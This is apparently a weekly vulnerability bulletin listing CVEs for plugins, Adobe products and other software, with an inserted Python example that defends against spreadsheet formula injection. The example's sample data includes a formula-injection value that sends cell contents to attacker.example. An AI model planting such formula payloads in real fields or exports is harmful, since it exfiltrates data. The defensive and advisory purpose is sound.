| wpeverest--User Registration | Missing Authorization vulnerability in wpeverest User Registration user-registration allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects User Registration: from n/a through <= 4.4.6. | 2026-01-22 | not yet calculated | CVE-2025-67956 | https://patchstack.com/database/Wordpress/Plugin/user-registration/vulnerability/wordpress-user-registration-plugin-4-4-6-broken-access-control-vulnerability?_s_id=cve |
| wpeverest--User Registration | Missing Authorization vulnerability in wpeverest User Registration user-registration allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects User Registration: from n/a through <= 4.4.9. | 2026-01-22 | not yet calculated | CVE-2026-24353 | https://patchstack.com/database/Wordpress/Plugin/user-registration/vulnerability/wordpress-user-registration-plugin-4-4-9-arbitrary-shortcode-execution-vulnerability?_s_id=cve |
| wphocus--My auctions allegro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Reflected XSS. This issue affects My auctions allegro: from n/a through <= 3.6.32. | 2026-01-22 | not yet calculated | CVE-2025-67943 | https://patchstack.com/database/Wordpress/Plugin/my-auctions-allegro-free-edition/vulnerability/wordpress-my-auctions-allegro-plugin-3-6-32-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| wphocus--My auctions allegro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows PHP Local File Inclusion. This issue affects My auctions allegro: from n/a through <= 3.6.33. | 2026-01-22 | not yet calculated | CVE-2026-22464 | https://patchstack.com/database/Wordpress/Plugin/my-auctions-allegro-free-edition/vulnerability/wordpress-my-auctions-allegro-plugin-3-6-33-local-file-inclusion-vulnerability?_s_id=cve |
| wpjobportal--WP Job Portal | Authorization Bypass Through User-Controlled Key vulnerability in wpjobportal WP Job Portal wp-job-portal allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Job Portal: from n/a through <= 2.4.3. | 2026-01-22 | not yet calculated | CVE-2026-24379 | https://patchstack.com/database/Wordpress/Plugin/wp-job-portal/vulnerability/wordpress-wp-job-portal-plugin-2-4-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| wproyal--Bard | Missing Authorization vulnerability in wproyal Bard bard allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bard: from n/a through <= 2.229. | 2026-01-22 | not yet calculated | CVE-2025-63018 | https://patchstack.com/database/Wordpress/Theme/bard/vulnerability/wordpress-bard-theme-2-229-broken-access-control-vulnerability?_s_id=cve |
| wptravelengine--Travel Monster | Missing Authorization vulnerability in wptravelengine Travel Monster travel-monster allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Travel Monster: from n/a through <= 1.3.3. | 2026-01-23 | not yet calculated | CVE-2026-24607 | https://patchstack.com/database/Wordpress/Theme/travel-monster/vulnerability/wordpress-travel-monster-theme-1-3-3-broken-access-control-vulnerability?_s_id=cve |
| wpWave--Hide My WP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpWave Hide My WP hide_my_wp allows Reflected XSS. This issue affects Hide My WP: from n/a through <= 6.2.12. | 2026-01-22 | not yet calculated | CVE-2025-69098 | https://patchstack.com/database/Wordpress/Plugin/hide_my_wp/vulnerability/wordpress-hide-my-wp-plugin-6-2-12-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WPXPO--PostX | Missing Authorization vulnerability in WPXPO PostX ultimate-post allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PostX: from n/a through <= 5.0.3. | 2026-01-22 | not yet calculated | CVE-2025-69313 | https://patchstack.com/database/Wordpress/Plugin/ultimate-post/vulnerability/wordpress-postx-plugin-5-0-3-broken-access-control-vulnerability?_s_id=cve |
| XDocReport | A Server-Side Template Injection (SSTI) vulnerability in the FreeMarker component of opensagres XDocReport v1.0.0 to v2.1.0 allows attackers to execute arbitrary code via injecting crafted template expressions. | 2026-01-20 | not yet calculated | CVE-2025-64087 | https://github.com/opensagres/xdocreport https://github.com/opensagres/xdocreport/pull/705 https://hackmd.io/@cuongnh/BJEnw7SAlg https://hackmd.io/@cuongnh/SkQvhEf0lx https://github.com/AT190510-Cuong/CVE-2025-64087-SSTI- |
| XDocReport--XDocReport | An XML External Entity (XXE) vulnerability in opensagres XDocReport v0.9.2 to v2.0.3 allows attackers to execute arbitrary code via uploading a crafted .docx file. | 2026-01-20 | not yet calculated | CVE-2025-65482 | https://github.com/opensagres/xdocreport https://drive.google.com/drive/folders/1hUyCznpBN7ivo5krmyJ4OQc_q626Hy5q?usp=sharing https://hackmd.io/@cuongnh/r1B7B8fJ-g https://hackmd.io/@cuongnh/rkJPCgSy-l https://github.com/AT190510-Cuong/CVE-2025-65482-XXE- |
| XLPlugins--NextMove Lite | Authorization Bypass Through User-Controlled Key vulnerability in XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects NextMove Lite: from n/a through <= 2.23.0. | 2026-01-23 | not yet calculated | CVE-2026-24599 | https://patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-nextmove-lite/vulnerability/wordpress-nextmove-lite-plugin-2-23-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| XpeedStudio--Bajaar - Highly Customizable WooCommerce WordPress Theme | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in XpeedStudio Bajaar - Highly Customizable WooCommerce WordPress Theme bajaar allows PHP Local File Inclusion. This issue affects Bajaar - Highly Customizable WooCommerce WordPress Theme: from n/a through <= 2.1.0. | 2026-01-22 | not yet calculated | CVE-2025-69004 | https://patchstack.com/database/Wordpress/Theme/bajaar/vulnerability/wordpress-bajaar-highly-customizable-woocommerce-wordpress-theme-theme-2-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| Xpro--Xpro Elementor Addons | Unrestricted Upload of File with Dangerous Type vulnerability in Xpro Xpro Elementor Addons xpro-elementor-addons allows Upload a Web Shell to a Web Server. This issue affects Xpro Elementor Addons: from n/a through <= 1.4.19.1. | 2026-01-22 | not yet calculated | CVE-2025-69312 | https://patchstack.com/database/Wordpress/Plugin/xpro-elementor-addons/vulnerability/wordpress-xpro-elementor-addons-plugin-1-4-19-1-arbitrary-file-upload-vulnerability?_s_id=cve |
| xtemos--WoodMart | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in xtemos WoodMart woodmart allows Code Injection. This issue affects WoodMart: from n/a through <= 8.3.7. | 2026-01-22 | not yet calculated | CVE-2025-47600 | https://patchstack.com/database/Wordpress/Theme/woodmart/vulnerability/wordpress-woodmart-theme-8-3-7-arbitrary-shortcode-execution-vulnerability?_s_id=cve |
| xwiki--xwiki-platform | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Versions 7.0-milestone-2 through 16.10.11, 17.0.0-rc-1 through 17.4.4, and 17.5.0-rc-1 through 17.7.0 contain a reflected Cross-site Scripting (XSS) vulnerability, which allows an attacker to craft a malicious URL and execute arbitrary actions with the same privileges as the victim. If the victim has administrative or programming rights, those rights can be exploited to gain full access to the XWiki installation. This issue has been patched in versions 17.8.0-rc-1, 17.4.5 and 16.10.12. As a workaround, the patch can be applied manually: only a single line in templates/logging_macros.vm needs to be changed, and no restart is required. | 2026-01-23 | not yet calculated | CVE-2026-24128 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-wvqx-m5px-6cmp https://github.com/xwiki/xwiki-platform/commit/8337ac8c3b19c37f306723b638b2cae8b0a57dbf https://github.com/xwiki/xwiki-platform/releases/tag/xwiki-platform-16.10.12 https://github.com/xwiki/xwiki-platform/releases/tag/xwiki-platform-17.4.5 https://github.com/xwiki/xwiki-platform/releases/tag/xwiki-platform-17.8.0-rc-1 https://jira.xwiki.org/browse/XWIKI-23462 |
| yasir129--Turn Yoast SEO FAQ Block to Accordion | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in yasir129 Turn Yoast SEO FAQ Block to Accordion faq-schema-block-to-accordion allows Stored XSS. This issue affects Turn Yoast SEO FAQ Block to Accordion: from n/a through <= 1.0.6. | 2026-01-23 | not yet calculated | CVE-2026-24591 | https://patchstack.com/database/Wordpress/Plugin/faq-schema-block-to-accordion/vulnerability/wordpress-turn-yoast-seo-faq-block-to-accordion-plugin-1-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| YITHEMES--YITH WooCommerce Request A Quote | Missing Authorization vulnerability in YITHEMES YITH WooCommerce Request A Quote yith-woocommerce-request-a-quote allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects YITH WooCommerce Request A Quote: from n/a through <= 2.46.0. | 2026-01-22 | not yet calculated | CVE-2026-24366 | https://patchstack.com/database/Wordpress/Plugin/yith-woocommerce-request-a-quote/vulnerability/wordpress-yith-woocommerce-request-a-quote-plugin-2-46-0-broken-access-control-vulnerability?_s_id=cve |
| zhblue--hustoj | hustoj is an open source online judge based on PHP/C++/MySQL/Linux for ACM/ICPC and NOIP training. All versions are vulnerable to CSV Injection (Formula Injection) through the contest rank export functionality (contestrank.xls.php and admin/ranklist_export.php). The application fails to sanitize user-supplied input (specifically the "Nickname" field) before exporting it to an .xls file (actually an HTML table, which Excel opens as a spreadsheet). If a malicious user sets their nickname to an Excel formula, that formula is evaluated when an administrator exports the rank list and opens it in Microsoft Excel. This can lead to arbitrary command execution (RCE) on the administrator's machine or data exfiltration. A fix was not available at the time of publication. | 2026-01-21 | not yet calculated | CVE-2026-23873 | https://github.com/zhblue/hustoj/security/advisories/GHSA-gqwv-v7vx-2qjw |
| zohocrm--Zoho CRM Lead Magnet | Missing Authorization vulnerability in zohocrm Zoho CRM Lead Magnet zoho-crm-forms allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Zoho CRM Lead Magnet: from n/a through <= 1.8.1.5. | 2026-01-23 | not yet calculated | CVE-2026-24595 | https://patchstack.com/database/Wordpress/Plugin/zoho-crm-forms/vulnerability/wordpress-zoho-crm-lead-magnet-plugin-1-8-1-5-broken-access-control-vulnerability?_s_id=cve |
| ZoomIt--DZS Video Gallery | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ZoomIt DZS Video Gallery dzs-videogallery allows SQL Injection. This issue affects DZS Video Gallery: from n/a through <= 12.37. | 2026-01-22 | not yet calculated | CVE-2025-49049 | https://patchstack.com/database/Wordpress/Plugin/dzs-videogallery/vulnerability/wordpress-dzs-video-gallery-plugin-12-37-sql-injection-vulnerability?_s_id=cve |
| zozothemes--Miion | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in zozothemes Miion miion allows PHP Local File Inclusion. This issue affects Miion: from n/a through <= 1.2.7. | 2026-01-22 | not yet calculated | CVE-2025-68913 | https://patchstack.com/database/Wordpress/Theme/miion/vulnerability/wordpress-miion-theme-1-2-7-local-file-inclusion-vulnerability?_s_id=cve |
| zozothemes--Miion | Unrestricted Upload of File with Dangerous Type vulnerability in zozothemes Miion miion allows Upload a Web Shell to a Web Server. This issue affects Miion: from n/a through <= 1.2.7. | 2026-01-22 | not yet calculated | CVE-2025-68986 | https://patchstack.com/database/Wordpress/Theme/miion/vulnerability/wordpress-miion-theme-1-2-7-arbitrary-file-upload-vulnerability?_s_id=cve |
| Zuinq Studio--IsMyGym | Reflected Cross-Site Scripting (XSS) vulnerability in IsMyGym by Zuinq Studio. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending them a malicious URL with '/<PATH>.php/<XSS>'. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user. | 2026-01-20 | not yet calculated | CVE-2025-41081 | https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-ismygym |
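The hustoj entry above (CVE-2026-23873) describes the general formula-injection failure mode: a user-controlled string that begins with a formula trigger character is written into a file that Excel opens, and Excel evaluates it. The following Python is an added illustration, not code from hustoj or from the advisory. It shows the two checks a practitioner would add: flagging formula-shaped nicknames at input time and, more importantly, neutralizing every user-controlled cell at export time for both a CSV export and an HTML-table-as-.xls export. The sample rank rows and nicknames are constructed for the demonstration, and all function names are my own.

```python
import csv
import html
import io

# Leading characters that make Excel and LibreOffice evaluate a cell instead of
# displaying it (the set recommended in OWASP's CSV injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True when a spreadsheet would treat `value` as a formula rather than text.

    Leading whitespace is ignored because some importers trim it before
    deciding; this errs on the side of flagging (a nickname like "-10" is
    flagged too, which is why this is a signal, not a hard reject).
    """
    return value.lstrip().startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: str) -> str:
    """Return `value` made safe to place in a spreadsheet cell.

    Tabs and line breaks are replaced because they can split or terminate a
    field in some importers. A leading apostrophe forces text interpretation;
    CSV quoting alone does not help, since Excel strips the quotes and still
    sees the leading "=".
    """
    cleaned = value.replace("\t", " ").replace("\r", " ").replace("\n", " ")
    if is_formula_like(cleaned):
        return "'" + cleaned
    return cleaned


def export_csv(header, rows) -> str:
    """Write a rank list as CSV with every user-controlled cell neutralized."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return buf.getvalue()


def export_html_table(header, rows) -> str:
    """A hustoj-style ".xls" export is really an HTML table that Excel opens.

    Both defenses apply: HTML-escape (so the browser view is not an XSS sink)
    and neutralize (so Excel does not evaluate the decoded cell text).
    """
    def td(cell):
        return "<td>" + html.escape(neutralize_cell(str(cell)), quote=False) + "</td>"

    lines = ["<table>",
             "<tr>" + "".join("<th>%s</th>" % html.escape(h) for h in header) + "</tr>"]
    for row in rows:
        lines.append("<tr>" + "".join(td(c) for c in row) + "</tr>")
    lines.append("</table>")
    return "\n".join(lines)


# Constructed sample data: a legitimate nickname, one that merely starts with
# "-", and two formula-shaped nicknames of the kind the advisory describes.
SAMPLE_HEADER = ("rank", "nickname", "solved")
SAMPLE_ROWS = [
    (1, "alice", 12),
    (2, "-_-", 9),
    (3, '=HYPERLINK("http://attacker.example/?x="&A1,"open")', 7),
    (4, "@SUM(1,2)\tevil", 5),
]


def flagged_nicknames(rows):
    """What an input-time check on the nickname field would report."""
    return [row[1] for row in rows if is_formula_like(row[1])]


if __name__ == "__main__":
    print("flag at input:", flagged_nicknames(SAMPLE_ROWS))
    print(export_csv(SAMPLE_HEADER, SAMPLE_ROWS))
    print(export_html_table(SAMPLE_HEADER, SAMPLE_ROWS))
```

The input-time flag is only a secondary signal, because harmless nicknames can legitimately start with "-" or "+"; the fix that actually closes the hole is neutralizing at export time, applied to every cell that a user can influence, in every export path (here both the CSV and the HTML-table variant).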
Vulnerability Summary for the Week of January 12, 2026
Posted on Tuesday January 20, 2026
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 10-Strike--Strike Network Inventory Explorer Pro | 10-Strike Network Inventory Explorer Pro 9.31 contains a buffer overflow vulnerability in the text file import functionality that allows remote code execution. Attackers can craft a malicious text file with a carefully constructed payload to trigger a reverse shell and execute arbitrary code on the target system. | 2026-01-15 | 9.8 | CVE-2021-47772 | ExploitDB-50472 Vendor Homepage |
| 10-Strike--Strike Network Inventory Explorer Pro | 10-Strike Network Inventory Explorer Pro 9.31 contains an unquoted service path vulnerability in the srvInventoryWebServer service running with LocalSystem privileges. Attackers can exploit the unquoted path by placing malicious executables in potential path segments to achieve privilege escalation and execute code with system-level permissions. | 2026-01-15 | 7.8 | CVE-2021-47767 | ExploitDB-50494 Vendor Homepage |
| 4Homepages--4images | 4images 1.9 contains a remote command execution vulnerability that allows authenticated administrators to inject reverse shell code through template editing functionality. Attackers can save malicious code in the template and execute arbitrary commands by accessing a specific categories.php endpoint with a crafted cat_id parameter. | 2026-01-13 | 8.8 | CVE-2022-50806 | ExploitDB-51147 Official 4images Software Download Page VulnCheck Advisory: 4images 1.9 - Remote Command Execution (RCE) |
| ABB--ABB Ability OPTIMAX | Incorrect Implementation of Authentication Algorithm vulnerability in ABB ABB Ability OPTIMAX. This issue affects ABB Ability OPTIMAX: 6.1, 6.2, from 6.3.0 before 6.3.1-251120, from 6.4.0 before 6.4.1-251120. | 2026-01-16 | 8.1 | CVE-2025-14510 | https://search.abb.com/library/Download.aspx?DocumentID=9AKK108472A1331&LanguageCode=en&DocumentPartId=&Action=Launch |
| Acer--Acer Backup Manager Module | Acer Backup Manager 3.0.0.99 contains an unquoted service path vulnerability in the NTI IScheduleSvc service that allows local users to potentially execute arbitrary code. Attackers can exploit the unquoted path in C:\Program Files (x86)\NTI\Acer Backup Manager\ to inject malicious executables that would run with elevated LocalSystem privileges. | 2026-01-16 | 7.8 | CVE-2021-47826 | ExploitDB-49889 Acer Official Homepage VulnCheck Advisory: Acer Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path |
| Acer--Acer Updater Service | Acer Updater Service 1.2.3500.0 contains an unquoted service path vulnerability that allows local users to execute code with elevated system privileges. Attackers can exploit the unquoted path in C:\Program Files\Acer\Acer Updater\ to inject malicious executables that will run with LocalSystem permissions during service startup. | 2026-01-16 | 7.8 | CVE-2021-47825 | ExploitDB-49890 Acer Official Homepage VulnCheck Advisory: Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path |
| Acer--ePowerSvc | Acer ePowerSvc 6.0.3008.0 contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup. | 2026-01-16 | 7.8 | CVE-2021-47823 | ExploitDB-49900 Acer Official Homepage VulnCheck Advisory: ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path |
| Adobe--Bridge | Bridge versions 15.1.2, 16.0 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21283 | https://helpx.adobe.com/security/products/bridge/apsb26-07.html |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead to arbitrary code execution by an attacker. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed. | 2026-01-13 | 8.6 | CVE-2026-21267 | https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed. | 2026-01-13 | 8.6 | CVE-2026-21268 | https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed. | 2026-01-13 | 8.6 | CVE-2026-21271 | https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Input Validation vulnerability that could lead to arbitrary file system write. An attacker could leverage this vulnerability to manipulate or inject malicious data into files on the system. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed. | 2026-01-13 | 8.6 | CVE-2026-21272 | https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html |
| Adobe--Dreamweaver Desktop | Dreamweaver Desktop versions 21.6 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could leverage this vulnerability to bypass security measures and execute unauthorized code. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21274 | https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html |
| Adobe--Illustrator | Illustrator versions 29.8.3, 30.0 and earlier are affected by an Untrusted Search Path vulnerability that could result in arbitrary code execution in the context of the current user. If the application uses a search path to locate critical resources such as programs, an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed. | 2026-01-13 | 8.6 | CVE-2026-21280 | https://helpx.adobe.com/security/products/illustrator/apsb26-03.html |
| Adobe--InCopy | InCopy versions 21.0, 19.5.5 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21281 | https://helpx.adobe.com/security/products/incopy/apsb26-04.html |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21275 | https://helpx.adobe.com/security/products/indesign/apsb26-02.html |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21276 | https://helpx.adobe.com/security/products/indesign/apsb26-02.html |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21277 | https://helpx.adobe.com/security/products/indesign/apsb26-02.html |
| Adobe--InDesign Desktop | InDesign Desktop versions 21.0, 19.5.5 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21304 | https://helpx.adobe.com/security/products/indesign/apsb26-02.html |
| Adobe--Substance3D - Designer | Substance3D - Designer versions 15.0.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21307 | https://helpx.adobe.com/security/products/substance3d_designer/apsb26-13.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21298 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| Adobe--Substance3D - Modeler | Substance3D - Modeler versions 1.22.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21299 | https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html |
| Adobe--Substance3D - Painter | Substance3D - Painter versions 11.0.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21305 | https://helpx.adobe.com/security/products/substance3d_painter/apsb26-10.html |
| Adobe--Substance3D - Sampler | Substance3D - Sampler versions 5.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21306 | https://helpx.adobe.com/security/products/substance3d-sampler/apsb26-11.html |
| Adobe--Substance3D - Stager | Substance3D - Stager versions 3.1.5 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-01-13 | 7.8 | CVE-2026-21287 | https://helpx.adobe.com/security/products/substance3d_stager/apsb26-09.html |
| Advantech--IoTSuite and IoT Edge Products | Successful exploitation of the SQL injection vulnerability could allow an unauthenticated remote attacker to execute arbitrary SQL commands on the vulnerable service when it is exposed to the Internet. | 2026-01-12 | 10 | CVE-2025-52694 | https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001/ |
| agentfront--enclave | Enclave is a secure JavaScript sandbox designed for safe AI agent code execution. Prior to 2.7.0, there is a critical sandbox escape vulnerability in enclave-vm that allows untrusted, sandboxed JavaScript code to execute arbitrary code in the host Node.js runtime. When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host Function constructor. An attacker can intentionally trigger a host error, then climb the prototype chain. Using the host Function constructor, arbitrary JavaScript can be compiled and executed in the host context, fully bypassing the sandbox and granting access to sensitive resources such as process.env, filesystem, and network. This breaks enclave-vm's core security guarantee of isolating untrusted code. This vulnerability is fixed in 2.7.0. | 2026-01-13 | 10 | CVE-2026-22686 | https://github.com/agentfront/enclave/security/advisories/GHSA-7qm7-455j-5p63 https://github.com/agentfront/enclave/commit/ed8bc438b2cd6e6f0b5f2de321e5be6f0169b5a1 |
| ahmadgb--GeekyBot Generate AI Content Without Prompt, Chatbot and Lead Generation | The GeekyBot - Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the chat message field in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the Chat History page. | 2026-01-14 | 7.2 | CVE-2025-15266 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b30e84db-c73f-4df2-9c88-c37a7e14c95b?source=cve https://wordpress.org/plugins/geeky-bot/ |
| Aimeos--Aimeos Laravel ecommerce platform | Aimeos 2021.10 LTS contains a SQL injection vulnerability in the json api 'sort' parameter that allows attackers to inject malicious database queries. Attackers can manipulate the sort parameter to reveal table and column names by sending crafted GET requests to the jsonapi/review endpoint. | 2026-01-15 | 8.2 | CVE-2021-47763 | ExploitDB-50538 Vendor Homepage Aimeos Laravel E-Commerce Package |
| Aimone-Video-Converter--AimOne Video Converter | AimOne Video Converter 2.04 Build 103 contains a buffer overflow vulnerability in its registration form that causes application crashes. Attackers can generate a 7000-byte payload to trigger the denial of service and potentially exploit the software's registration mechanism. | 2026-01-13 | 9.8 | CVE-2023-54328 | ExploitDB-51196 AimOne Video Converter Software Informer Page Archived AimOne Software Website Vulnerability Reproduction Repository VulnCheck Advisory: AimOne Video Converter 2.04 Build 103 Buffer Overflow in Registration Form |
| Aiven-Open--bigquery-connector-for-apache-kafka | Kafka Connect BigQuery Connector is an implementation of a sink connector from Apache Kafka to Google BigQuery. Prior to 2.11.0, there is an arbitrary file read in Google BigQuery Sink connector. Aiven's Google BigQuery Kafka Connect Sink connector requires Google Cloud credential configurations for authentication to BigQuery services. During connector configuration, users can supply credential JSON files that are processed by Google authentication libraries. The service fails to validate externally-sourced credential configurations before passing them to the authentication libraries. An attacker can exploit this by providing a malicious credential configuration containing crafted credential_source.file paths or credential_source.url endpoints, resulting in arbitrary file reads or SSRF attacks. | 2026-01-16 | 7.7 | CVE-2026-23529 | https://github.com/Aiven-Open/bigquery-connector-for-apache-kafka/security/advisories/GHSA-3mg8-2g53-5gj4 https://github.com/Aiven-Open/bigquery-connector-for-apache-kafka/commit/20ea3921c6fe72d605a033c1943b20f49eaba981 https://docs.cloud.google.com/support/bulletins#gcp-2025-005 https://github.com/Aiven-Open/bigquery-connector-for-apache-kafka/releases/tag/v2.11.0 |
| ajseidl--AJS Footnotes | The AJS Footnotes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'note_list_class' and 'popup_display_effect_in' parameters in all versions up to, and including, 1.0 due to missing authorization and nonce verification on settings save, as well as insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to update plugin settings and inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 7.2 | CVE-2025-15378 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4da167e0-c1cf-496f-9b14-35fc70386be1?source=cve https://plugins.trac.wordpress.org/browser/ajs-footnotes/tags/1.0/ajs_footnotes.php?marks=138,271,303#L138 |
| Algo Solutions--Algo 8028 | Algo 8028 Control Panel version 3.3.3 contains a command injection vulnerability in the fm-data.lua endpoint that allows authenticated attackers to execute arbitrary commands. Attackers can exploit the insecure 'source' parameter by injecting commands that are executed with root privileges, enabling remote code execution through a crafted POST request. | 2026-01-13 | 8.8 | CVE-2022-50909 | ExploitDB-50960 Algo Solutions Official Homepage Algo 8028 Firmware Downloads VulnCheck Advisory: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated) |
| Altium--Altium 365 | A stored cross-site scripting (XSS) vulnerability exists in the Altium Forum due to missing server-side input sanitization in forum post content. An authenticated attacker can inject arbitrary JavaScript into forum posts, which is stored and executed when other users view the affected post. Successful exploitation allows the attacker's payload to execute in the context of the victim's authenticated Altium 365 session, enabling unauthorized access to workspace data, including design files and workspace settings. Exploitation requires user interaction to view a malicious forum post. | 2026-01-15 | 9 | CVE-2026-1009 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A stored cross-site scripting (XSS) vulnerability exists in the Altium Workflow Engine due to missing server-side input sanitization in workflow form submission APIs. A regular authenticated user can inject arbitrary JavaScript into workflow data. When an administrator views the affected workflow, the injected payload executes in the administrator's browser context, allowing privilege escalation, including creation of new administrator accounts, session token theft, and execution of administrative actions. | 2026-01-15 | 8 | CVE-2026-1010 | https://www.altium.com/platform/security-compliance/security-advisories |
